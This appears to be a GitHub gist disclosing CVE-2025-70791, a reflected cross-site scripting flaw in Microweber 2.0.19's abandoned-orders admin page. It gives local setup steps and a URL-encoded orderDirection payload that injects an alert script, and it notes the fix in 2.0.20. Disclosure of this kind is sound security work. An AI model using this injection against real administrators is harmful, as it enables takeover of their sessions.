Skip to content

Instantly share code, notes, and snippets.

@TimRecktenwald
Last active February 4, 2026 23:04
Show Gist options
  • Select an option

  • Save TimRecktenwald/9615b9915a4cacda9f57bb57f13ab6d4 to your computer and use it in GitHub Desktop.

Select an option

Save TimRecktenwald/9615b9915a4cacda9f57bb57f13ab6d4 to your computer and use it in GitHub Desktop.
CVE-2025-70791

PoC for CVE-2025-70791

Cross Site Scripting vulnerability in the "/admin/order/abandoned" endpoint of Microweber <=2.0.19. An attacker can manipulate the "orderDirection" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.

Description:

App Installation:

  1. Clone the repository and build the application using docker:
    git clone -b v2.0.19 https://github.com/microweber/microweber.git
    cd microweber
    docker compose up -d
    
  2. Visit http://localhost
  3. Follow along the UI installation process.

Steps to reproduce:

  1. Visit the following exploit URL: http://localhost/admin/order/abandoned?orderDirection=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
  2. The page will immediately display an alert pop-up.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment